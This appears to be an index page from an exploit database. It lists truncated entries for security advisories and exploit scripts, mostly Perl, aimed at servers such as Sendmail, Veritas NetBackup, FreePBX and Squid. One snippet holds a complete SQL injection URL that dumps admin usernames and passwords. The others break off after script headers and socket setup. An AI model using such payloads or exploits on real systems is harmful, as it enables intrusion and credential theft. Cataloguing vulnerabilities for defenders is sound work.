FreeBSD Security Advisory FreeBSD-SA-14:19.tcp

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-14:19.tcp Security Advisory The FreeBSD Project Topic: Denial of Service in TCP packet processing Category: core Module: inet Announced: 2014-09-16 Credits:...

CVE-2014-4943

The PPPoL2TP feature in net/l2tp/l2tpppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure differences between an l2tp socket and an inet socket...

Wireshark < 0.99.5 DNP3 Dissector Infinite Loop Exploit

No description provided by source. !/usr/bin/perl Automatically generated by beSTORMtm Copyright Beyond Security c 2003-2007 $Revision: 3741 $ Attack vector: M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 Module: DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host =...

httpdx 1.5.4 - Remote HTTP Server Denial of Service

No description provided by source. !/usr/bin/perl -w ====================================================================== Exploit Title: httpdx v1.5.4 Remote HTTP Server DoS using wildcards Date: 18 July 2012 Exploit Author: st3n at sign funoverip dot net Vendor Homepage:...

SHOP-INET 4 (show_cat2.php grid) - SQL Injection Vulnerability

No description provided by source. SHOP-INET V.4 Exploit Author: FeDeReR Home : Hacking.ge & darkc0de.com Email : [email protected] Exploit : target.com/showcat2.php?grid=-1+union+select+concatwschar58,username,password+from+admin Example...

Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit

No description provided by source. black-hole.pl Sendmail w/ clamav-milter Remote Root Exploit Copyright c 2007 Eliteboy use IO::Socket; print Sendmail w/ clamav-milter Remote Root Exploit\n; print Copyright C 2007 Eliteboy\n; if $ARGV != 0 print Give me a host to connect.\n;exit; print Attacking...

Red Hat Interchange 4.8.x Arbitrary File Read Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/5453/info A vulnerability has been reported for Interchange 4.8.5 and earlier. Reportedly, Interchange may disclose contents of files to attackers. The vulnerability occurs due to the placement of the 'doc' folder...

iNet Online Community Blind SQLi Vulnerability

No description provided by source. Exploit Title: iNet Online Community Blind SQLi Vulnerability Author: JaMbA Script url: http://www.i-netsolution.com/online-community-php-scripts.html Tested on: Windows =================Exploit================== EXPL0!T...

MollenSoft Lightweight FTP Server 3.6 - Remote Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10409/info A denial of service condition is reported to exist in the MollenSoft Lightweight FTP Server that may allow a remote user to deny service to legitimate FTP users. The vulnerability is due to a lack of sufficient...

Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (OS X)

No description provided by source. !/usr/bin/perl VERITAS-OSX.pl - VERITAS NetBackup Format Strings OSX/ppc Remote Exploit johnhatdigitalmunitiondotcom bug found by kflistsatdigitalmunitiondotcom http://www.digitalmunition.com/ use POSIX; use IO::Socket; use IO::Select; my $shellcode = / OSX...

Novell Iprint LPD Remote Code Execution Vulnerability

No description provided by source. !/usr/bin/perl Source: http://www.protekresearchlab.com/index.php?option=comcontent&view=article&id=21&Itemid=21 use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '10.102.3.79'; my $port = 515; my $proto = 'tcp'; my $sockType = SOCKSTREAM; my $timeou...

FtpLocate <= 2.02 (current) Remote Command Execution Exploit

No description provided by source. Alot of code for a cgi | vuln. /str0ke !/usr/bin/perl FtpLocate = 2.02 current remote exploit VERY PRIVATE VERSION DO NOT DISTRIBUTE newbug Tseng at chroot.org sub mysocket my $s=IO::Socket::INET-newPeerAddr = $host, PeerPort = 80, Proto = tcp or die socket: ; s...

P2GChinchilla HTTP Server 1.1.1 - Denial of Service Exploit

No description provided by source. !/usr/bin/perl File Name :P2GChinchillaTM HTTP Server Vuln : Remote Denial Of Service Exploit Auther : Zer0 Thunder Msn : [email protected] ==------ Exploit Title: P2GChinchillaTM HTTP Server 1.1.1 Remote Denial Of Service Exploit Date: 22/01/2010...

Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC

No description provided by source. Exploit-DB mirror: http://www.exploit-db.com/sploits/33056-sepm-secars-poc-v0.3.tar.gz !/usr/bin/perl -w Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC Date: 31 January 2013 Exploit Author: [email protected] a.k.a...

Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service Exploit

No description provided by source. !usr/bin/perl -w Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0478 http://www.securityfocus.com/bid/33604/discuss $$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$ $$$$$Author will not bare any...

FreePBX 2.11.0 - Remote Command Execution

No description provided by source. !/usr/bin/perl use strict; use warnings; use IO::Socket::INET; Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution Google Dork: n/a Date: 2/25/14 Exploit Author: @0x00string Vendor Homepage: http://www.freepbx.org/ Software Link:...

AJ Matrix DNA SQL Injection

No description provided by source. !usr/bin/perl |------------------------------------------------------------------------------------------------------------------ | -Info: | -Name: AJ Matrix DNA | -Site: http://www.ajsquare.com/ajhome.php | -Bug: Sql Injection | -Found: by Br0ly | -BRAZIL D |...

KNet Web Server 1.04b - Stack Corruption BoF

No description provided by source. !/usr/bin/perl KNet Web Server Stack corruption BoF PoC Written by Wireghoul - http://www.justanotherhacker.com Date: 2013/04/11 Version: 1.04b Tested on: WinXP SP3 use IO::Socket::INET; $host = shift; $port = shift; print KNet Web Server stack corruption BoF Po...

Firebird 1.0 GDS_Inet_Server Interbase Environment Variable Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7546/info Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems. As Firebird is based on Borland/Inprise Interbase source code, it is very likely that Interbas...

Jakarta Slide <= 2.1 RC1 Remote File Disclosure Exploit

No description provided by source. !/usr/bin/perl Jakarta Slide Remote File Disclosure Zeroday Xploit eliteb0y / 2007 thanx to the whole team & andi : +++KEEP PRIV8+++ This Bug may reside in different WebDav implementations, Warp your mind! +You will need auth for the exploit to work... use...